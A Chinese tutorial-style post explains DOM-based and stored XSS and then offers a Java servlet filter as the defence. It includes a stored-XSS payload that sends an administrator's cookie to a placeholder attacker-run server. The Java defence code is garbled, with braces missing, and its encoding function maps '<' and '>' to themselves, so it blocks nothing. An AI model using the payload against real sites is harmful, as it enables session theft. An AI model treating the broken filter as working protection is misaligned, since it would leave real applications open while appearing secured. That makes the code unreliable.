一. Dom-Based XSS 漏洞攻击
危险系数:低
上面这个例子就是典型的based攻击,当黑客发送了一个链接给受害者,受害者点击了这个链接,这样黑客就能在自己搭建的服务里获取受害者的cookie信息。
分析:
现在的主流浏览器已经默认自带并开启了对于XSS(Cross Site Scripting)攻击的防护。所以这种类型的攻击危险系数低,且只要用户不要点击非官方发来的危险链接借可以避免信息被盗。
二.Stored XSS(存储式XSS漏洞)
危险系数: 高,危害大,危害人数多
Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。
黑客注册一个某网站的账号,然后自己去申请融资,在备注一栏目填写了
<script>window .open('http://黑客自己搭建的一个项目地址?cookie=document.cookie' )</script>
填完以后后台人员在不知情的情况下去审核,这个时候就会触发这个事件,后台人员的cookie就会被盗取。
三.防御措施
主要针对的是java 的防御措施,也可以通过购买web 防火墙解决
package com.jlfex.common.servlet;import org.apache.commons.lang3.StringUtils;import javax.servlet.*;import javax.servlet.http.HttpServletRequest;import java.io.IOException;public class XssFilter implements Filter @Override public void init (FilterConfig filterConfig) throws ServletException } @Override public void doFilter (ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException String requestType =(String) ((HttpServletRequest)request).getHeader("X-Requested-With" ); if (StringUtils.isNotEmpty(requestType) && requestType.equals("XMLHttpRequest" )){ XssHttpServletRequestWrapper xssRequest = new XssHttpServletRequestWrapper( (HttpServletRequest) request); String content = (String) request.getAttribute("content" ); chain.doFilter(xssRequest, response); }else { chain.doFilter(request, response); } } @Override public void destroy () } }
package com.jlfex.common.servlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletRequestWrapper;public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper HttpServletRequest orgRequest = null ; public XssHttpServletRequestWrapper (HttpServletRequest request) super (request); orgRequest = request; } public String getParameter (String name) String value = super .getParameter(xssEncode(name)); if (value != null ) { value = xssEncode(value); } return value; } public String[] getParameterValues(String name) { String[] results = super .getParameterValues(xssEncode(name)); if (results == null || results.length <= 0 ) return null ; else { int length = results.length; for (int i=0 ;i<length;i++){ results[i] = xssEncode(results[i]); } return results; } } public String getHeader (String name) String value = super .getHeader(xssEncode(name)); if (value != null ) { value = xssEncode(value); } return value; } private static String xssEncode (String s) if (s == null || s.isEmpty()) { return s; } StringBuilder sb = new StringBuilder(s.length() + 16 ); for (int i = 0 ; i < s.length(); i++) { char c = s.charAt(i); switch (c) { case '>' : sb.append('>' ); break ; case '<' : sb.append('<' ); break ; default : sb.append(c); break ; } } return sb.toString(); } public HttpServletRequest getOrgRequest () return orgRequest; } public static HttpServletRequest getOrgRequest (HttpServletRequest req) if (req instanceof XssHttpServletRequestWrapper){ return ((XssHttpServletRequestWrapper)req).getOrgRequest(); } return req; } } `
```
